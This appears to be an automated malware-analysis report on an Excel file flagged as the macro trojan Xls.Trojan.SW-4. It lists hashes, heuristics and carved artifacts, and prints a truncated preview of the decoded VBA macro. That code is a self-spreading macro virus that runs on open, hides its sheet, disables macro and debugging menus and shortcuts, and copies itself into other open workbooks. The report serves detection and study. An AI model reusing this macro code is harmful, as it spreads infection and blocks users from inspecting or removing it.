Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1e334a8c41357bd…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 58cc9f79f809a17f89491ed319871f1d
SHA-1: 29e444d3f316223a9f58838afc5b1fe8031aca42
SHA-256: a1e334a8c41357bd53bc9344c7a698b18a1fedb00a594b91f12d302efe87aef1
Risk score: 340

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is an Excel document containing VBA macros, including Auto_Open and Auto_Close functions, which are commonly used to execute malicious code when the document is opened or closed. The macros attempt to modify Excel's menus and hide sheets, indicating an effort to conceal malicious activity or manipulate the user. The presence of embedded OLE structures and ClamAV detections further supports its malicious nature.

Heuristics (7)

  • ClamAV: Xls.Trojan.SW-4 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.SW-4
  • Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE)
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY)
    OLE file is 18,714 bytes but its declared streams total only 0 bytes — 18,714 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Auto_Open macro (high, OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS)
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21666 bytes
SHA-256: 9f2366e3334a6881a5899e89c026b2fab57d23e723a14788354706fa5f4cf5a3
Detection: ClamAV: Xls.Trojan.SW-4
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "sw"

'F051C320071ABCE57ADB4C960D7B44E91BC285
Declare Function GetCurrentTime Lib "USER" () As Long
Attribute GetCurrentTime.VB_ProcData.VB_Invoke_Func = " \n14"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "no"
End Sub
Sub no()
Attribute no.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.EnableCancelKey = xlDisabled
pawn$ = ActiveWorkbook.Name
pawns$ = ActiveWorkbook.ActiveSheet.Name
If ActiveWorkbook.Sheets("sw").Visible = True Then ActiveWorkbook.Sheets("sw").Visible = False
Application.MenuBars(xlWorksheet).Menus("tools").MenuItems("macro...").Delete
Application.MenuBars(xlWorksheet).Menus("tools").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record macro"
Application.MenuBars(xlNoDocuments).Menus("file").MenuItems("macro...").Delete
Application.MenuBars(xlNoDocuments).Menus("file").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record new macro..."
Application.MenuBars(xlModule).Menus("tools").MenuItems("macro...").Delete
Application.MenuBars(xlModule).Menus("tools").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record macro"
Application.MenuBars(xlModule).Menus("tools").MenuItems("menu editor...").Delete
Application.MenuBars(xlModule).Menus("tools").MenuItems.Add Caption:="Menu E&ditor...", OnAction:="", before:="attach toolbars..."
Application.MenuBars(xlModule).Menus("run").MenuItems("start").Delete
Application.MenuBars(xlModule).Menus("run").MenuItems.Add Caption:="S&tart", before:="end", OnAction:=""
Application.MenuBars(xlModule).Menus("run").MenuItems("step into").Delete
Application.MenuBars(xlModule).Menus("run").MenuItems.Add Caption:="Step &Into", before:="step over", OnAction:=""
Application.MenuBars(xlChart).Menus("tools").MenuItems("macro...").Delete
Application.MenuBars(xlChart).Menus("tools").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record macro"
Application.MenuBars(xlWorksheet).Menus("view").MenuItems("toolbars...").Delete
Application.MenuBars(xlWorksheet).Menus("view").MenuItems.Add Caption:="&Toolbars...", OnAction:="", before:=3
Application.MenuBars(xlModule).Menus("view").MenuItems("toolbars...").Delete
Application.MenuBars(xlModule).Menus("view").MenuItems.Add Caption:="&Toolbars...", OnAction:="", before:=3
Application.MenuBars(xlModule).Menus("view").MenuItems("debug window").Delete
Application.MenuBars(xlModule).Menus("view").MenuItems.Add Caption:="&Debug Window", OnAction:=""
Application.OnKey "{F5}", ""
Application.OnKey "{F8}", ""
Application.OnKey "^g", ""
Application.MenuBars(xlChart).Menus("view").MenuItems("toolbars...").Delete
Application.MenuBars(xlChart).Menus("view").MenuItems.Add Caption:="&Toolbars...", OnAction:="", before:=3
Application.ShortcutMenus(xlToolbar).MenuItems("toolbars...").Delete
Application.ShortcutMenus(xlToolbar).MenuItems.Add Caption:="Toolbars...", OnAction:=""
Application.ShortcutMenus(xlToolbar).MenuItems("customize...").Delete
Application.ShortcutMenus(xlToolbar).MenuItems.Add Caption:="Customize...", OnAction:=""
tc = Toolbars.Count
For s = 1 To tc
ttc = Toolbars(s).ToolbarButtons.Count
For t = 1 To ttc
If InStr("Run MacroStep IntoStep MacroMenu Editor", Toolbars(s).ToolbarButtons(t).Name) <> 0 And Toolbars(s).ToolbarButtons(t).Name <> "" Then Toolbars(s).ToolbarButtons(t).Enabled = False
Next t
Next s
wc = Workbooks.Count
If wc < 2 Then GoTo bye
Application.ScreenUpdating = False
j = 1
Do While j <= wc
wmc = Workbooks(j).Modules.Count
m = 1
Do While wmc > 0 And m <= wmc
If Workbooks(j).Modules(m).Name = "sw" Then Exit Do
m = m + 1
Loop
If m <= wmc Then Exit Do
j = j + 1
Loop
For i = 1 To wc
wmc = Workbooks(i).Sheets.Count
For n = 1 To wmc
If Workbooks(i).Sheets(n).Name = "sw" Then GoTo nexti
Next n
GoTo nfct
nexti:
Next i
GoTo bye
nfct:
wn$ = Workbooks(i).Name
Workbooks(j).Sheets("sw").Visible = True
Workbooks(j).Sheets("sw").Copy before:=Workbooks(i).Sheets(1)
Workbooks(j).Sheets("sw").Visible = False
Workbooks(i).Sheet
... (truncated)
Filename: embedded_office_off00002ee6.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside ole container at offset 0x2EE6
Size: 18714 bytes
SHA-256: d45da21841b829e54048f25c8acce5c48530a0312e96572afda77ebde54750a4